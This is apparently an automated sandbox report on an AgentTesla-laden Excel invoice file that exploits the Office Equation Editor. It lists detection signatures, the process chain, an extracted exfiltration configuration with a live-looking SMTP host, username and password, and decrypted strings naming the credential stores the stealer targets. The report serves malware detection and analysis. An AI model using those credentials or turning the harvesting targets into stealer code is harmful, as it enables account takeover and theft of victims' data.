Edit tour

Windows Analysis Report
Fatura 002.xlam.xlsx

Overview

General Information

Sample name:	Fatura 002.xlam.xlsx
Analysis ID:	1523149
MD5:	404eec23afb533475c11493f7d367ec0
SHA1:	844ba233d3ba4ecc44596bc78f90eecffd0286de
SHA256:	eab869eef3b586266919e8d303d196beeb0f22d3f3cbc7b1f521a7e67acd4cf5
Tags:	xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Document exploit detected (process start blacklist hit)

Installs new ROOT certificates

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3316 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 3516 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

coolz.exe (PID: 3660 cmdline: C:\Users\user\AppData\Local\Temp\coolz.exe MD5: 0FCFEEFEF9E389286B0EF7E97E1E7F28)

RegSvcs.exe (PID: 3688 cmdline: C:\Users\user\AppData\Local\Temp\coolz.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.solucionesmexico.mx", "Username": "security@solucionesmexico.mx", "Password": "    Qdk,[nKrmI0j             "}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sheet1.xml	INDICATOR_XML_LegacyDrawing_AutoLoad_Document	detects AutoLoad documents using LegacyDrawing	ditekSHen	0x27b:$s1: <legacyDrawing r:id=" 0x2a3:$s2: <oleObject progId=" 0x2dd:$s3: autoLoad="true"

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.622210442.0000000002001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 3688	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security

Sigma Signatures

Exploits

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3516, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.35.109, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3516, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: C:\Users\user\AppData\Local\Temp\coolz.exe, CommandLine: C:\Users\user\AppData\Local\Temp\coolz.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\coolz.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\coolz.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\coolz.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3516, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\coolz.exe, ProcessId: 3660, ProcessName: coolz.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Local\Temp\coolz.exe, CommandLine: C:\Users\user\AppData\Local\Temp\coolz.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\coolz.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\coolz.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\coolz.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3516, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\coolz.exe, ProcessId: 3660, ProcessName: coolz.exe

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\coolz.exe, CommandLine: C:\Users\user\AppData\Local\Temp\coolz.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\coolz.exe, ParentImage: C:\Users\user\AppData\Local\Temp\coolz.exe, ParentProcessId: 3660, ParentProcessName: coolz.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\coolz.exe, ProcessId: 3688, ProcessName: RegSvcs.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3516, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Fatura 002.xlam.xlsx

Avira: detected

Found malware configuration

Source: 6.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.solucionesmexico.mx", "Username": "security@solucionesmexico.mx", "Password": " Qdk,[nKrmI0j "}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: Fatura 002.xlam.xlsx	Virustotal: Detection: 50%			Perma Link
Source: Fatura 002.xlam.xlsx	ReversingLabs: Detection: 71%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: /log.tmp
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>[
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ]<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Time:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>User Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>Computer Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>OSFullName:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>CPU:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>RAM:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: New
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: mail.solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Qdk,[nKrmI0j
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Type
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \drivers\etc\hosts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <b>[
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ]</b> (
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: )<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {BACK}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ALT+TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ALT+F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ESC}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {Win}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {CAPSLOCK}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYUP}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYDOWN}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYLEFT}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYRIGHT}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {DEL}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {END}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {HOME}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {Insert}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {NumLock}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {PageDown}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {PageUp}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ENTER}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F1}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F2}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F3}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F5}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F6}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F7}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F8}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F9}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F10}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F11}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F12}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: control
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {CTRL}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: &
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: >
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: logins
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Secure Note
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Web Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Credential Picker Protector
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Web Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Domain Certificate Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Domain Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Extended Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UC Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UCBrowser\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Login Data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: journal
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: wow_logins
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Safari for Windows
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <array>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <dict>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <data>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </data>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: -convert xml1 -s -o "
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \fixed_keychain.xml"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Protect\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: QQ Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Default\EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Profile
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: entries
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: category
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: str3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: str2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: blob0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password_value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IncrediMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts_New
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: EmailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Eudora
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: current
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SavePasswordText
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ReturnAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Falkon Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \falkon\profiles\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \browsedata.db
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: autofill
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ClawsMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Claws-mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passkey0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accountrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: smtp_server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: address
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \passwordstorerc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {(.),(.)}(.*)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Flock Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Flock\Browser\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: signons3.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: DynDns
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: https://account.dyn.com/
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: t6KzXhCh
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: global
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: name
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Psi\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Psi+\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: OpenVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: auth-data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: entropy
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: USERPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \OpenVPN\config\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVpn.exe*
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: user.config
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: //setting[@name='Username']/value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: //setting[@name='Password']/value
